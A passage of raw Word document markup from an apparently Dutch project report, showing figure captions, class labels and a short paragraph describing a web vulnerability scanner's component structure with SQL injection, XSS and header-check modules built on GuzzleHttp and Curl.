                    <w:p w14:paraId="4B0CA0A0" w14:textId="2813259A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.21</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007A28D2">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371EB28" w14:textId="21230D6A" w:rsidR="00D20E87" w:rsidRDefault="00D20E87">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253136896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53F4B49D" wp14:editId="25363051">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>864870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1144270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="766" name="Text Box 766"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318635"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E0EE69" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00CA5627" w:rsidRDefault="002A05E5" w:rsidP="00501C35">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B49D" id="Text Box 766" o:spid="_x0000_s1248" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.1pt;margin-top:90.1pt;width:340.05pt;height:27.2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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15E0EE69" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00CA5627" w:rsidRDefault="002A05E5" w:rsidP="00501C35">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253135872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38B0AF84" wp14:editId="789FCADB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>866140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>575310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="765" name="Text Box 765"/>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56A4F7" w14:textId="1752FABF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00501C35">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>GuzzleHttp</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="78E8D57C" w14:textId="656A3F3C" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00501C35">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>C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0AF84" id="Text Box 765" o:spid="_x0000_s1249" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.2pt;margin-top:45.3pt;width:340pt;height:45.2pt;z-index:2531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" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3C56A4F7" w14:textId="1752FABF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00501C35">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="78E8D57C" w14:textId="656A3F3C" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00501C35">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Curl</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253134848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D69EAD3" wp14:editId="0369459A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>866775</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>234950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="764" name="Text Box 764"/>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966CEA" w14:textId="51B2E981" w:rsidR="002A05E5" w:rsidRPr="00553D99" w:rsidRDefault="002A05E5" w:rsidP="00501C35">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00553D99">
                              <w:rPr>
                                <w:b/>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9EAD3" id="Text Box 764" o:spid="_x0000_s1250" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.25pt;margin-top:18.5pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17966CEA" w14:textId="51B2E981" w:rsidR="002A05E5" w:rsidRPr="00553D99" w:rsidRDefault="002A05E5" w:rsidP="00501C35">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00553D99">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Scanner</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253138944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D78CBA7" wp14:editId="612FD773">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>864235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1489710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="1031240"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="769" name="Text Box 769"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318635" cy="10312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F0DD7C" w14:textId="689177EC" w:rsidR="002A05E5" w:rsidRPr="00AD2D89" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD2D89">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Module</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="729F6924" w14:textId="0D4CD90E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>BlindSQLModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A475321" w14:textId="38136EF1" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>SQLModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="582FAD2D" w14:textId="5C93D3FD" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>XSSModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4BF715A6" w14:textId="147ACA34" w:rsidR="002A05E5" w:rsidRPr="00DE5F14" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Header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CBA7" id="Text Box 769" o:spid="_x0000_s1251" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.05pt;margin-top:117.3pt;width:340.05pt;height:81.2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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FF0DD7C" w14:textId="689177EC" w:rsidR="002A05E5" w:rsidRPr="00AD2D89" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD2D89">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Module</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="729F6924" w14:textId="0D4CD90E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>BlindSQLModule</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A475321" w14:textId="38136EF1" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>SQLModule</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="582FAD2D" w14:textId="5C93D3FD" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>XSSModule</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4BF715A6" w14:textId="147ACA34" w:rsidR="002A05E5" w:rsidRPr="00DE5F14" w:rsidRDefault="002A05E5" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>HeaderModule</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253132800" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56258B07" wp14:editId="3D437D6F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1022350</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="761" name="Rectangle 7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6B149" id="Rectangle 761" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-80.45pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0457361A" w14:textId="42A56EFB" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="20C32B62" w14:textId="5EAF0D88" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="2AE8578A" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="2E7300E2" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="0CF596FA" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="44ADA320" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="5457E634" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="4B274217" w14:textId="2CA8E6A2" w:rsidR="00D20E87" w:rsidRDefault="00AD2D89">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253157376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66A4ABB1" wp14:editId="579C044E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>300990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5715000" cy="1488440"/>
                <wp:effectExtent l="0" t="0" r="25400" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="708" name="Text Box 708"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5715000" cy="14884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228D739" w14:textId="645F7AEB" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>De Scanner component maakt gebruik van twee Libraries GuzzleHttp en Curl. Ik heb tijdens het ontwikkelen gemerkt dat GuzzleHttp niet goed kan omgaan met Post Requests maar Curl wel, daarom handelt GuzzleHttp de GET Request uit en Curl de Post Request. De component bestaat uit vijf Klasses waarvan de Module klasse de parent is van BlindSQLModule, SQLModule ne XSSModule. Dit zijn aanval georiënteerde Modules voor het simuleren van http-aanvallen. HeaderModule erft niets over van Module om dat het de abstracte functies niet nodig heeft. Hieronder staan twee functie, buildGETURI() voor het bouwen van HTTP GET Request en attackGet() voor het uitvoeren van de HTTP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4ABB1" id="Text Box 708" o:spid="_x0000_s1252" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:8pt;margin-top:23.7pt;width:450pt;height:117.2pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1228D739" w14:textId="645F7AEB" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>De Scanner component maakt gebruik van twee Libraries GuzzleHttp en Curl. Ik heb tijdens het ontwikkelen gemerkt dat GuzzleHttp niet goed kan omgaan met Post Requests maar Curl wel, daarom handelt GuzzleHttp de GET Request uit en Curl de Post Request. De component bestaat uit vijf Klasses waarvan de Module klasse de parent is van BlindSQLModule, SQLModule ne XSSModule. Dit zijn aanval georiënteerde Modules voor het simuleren van http-aanvallen. HeaderModule erft niets over van Module om dat het de abstracte functies niet nodig heeft. Hieronder staan twee functie, buildGETURI() voor het bouwen van HTTP GET Request en attackGet() voor het uitvoeren van de HTTP GET Request.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4AD7CF" w14:textId="27AD5835" w:rsidR="007A28D2" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253231104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="401DBE39" wp14:editId="33B08229">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>289560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6169025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1016000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="828" name="Text Box 828"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="101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46DE3" w14:textId="7D2A6205" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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DBE39" id="Text Box 828" o:spid="_x0000_s1253" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:22.8pt;margin-top:485.75pt;width:80pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D946DE3" w14:textId="7D2A6205" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.22</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005C183E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253139968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E3D97EE" wp14:editId="578C32BE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>298450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1600200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4890135" cy="4473575"/>
            <wp:effectExtent l="25400" t="25400" r="37465" b="22225"/>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build get.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4890135" cy="447357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7A28D2">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="683A26E4" w14:textId="2A43EB83" w:rsidR="002C79AC" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253232128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AAEBB56" wp14:editId="627C1C08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>292735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7317740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="829" name="Text Box 829"/>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316BBF" w14:textId="401539DC" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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EBB56" id="Text Box 829" o:spid="_x0000_s1254" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:23.05pt;margin-top:576.2pt;width:90pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E316BBF" w14:textId="401539DC" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.23</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00787CE7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253142016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B8D9AEA" wp14:editId="2EC47C6C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>304800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5143500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5512435" cy="2054860"/>
            <wp:effectExtent l="25400" t="25400" r="24765" b="2794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get attack 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5512435" cy="205486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787CE7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253140992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CD691A1" wp14:editId="557B4147">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>300355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>25400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5516245" cy="5140325"/>
            <wp:effectExtent l="25400" t="25400" r="20955" b="15875"/>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et attack.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5516245" cy="514032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3B7873" w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253144064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68D5DA8B" wp14:editId="7A340333">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-911860</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
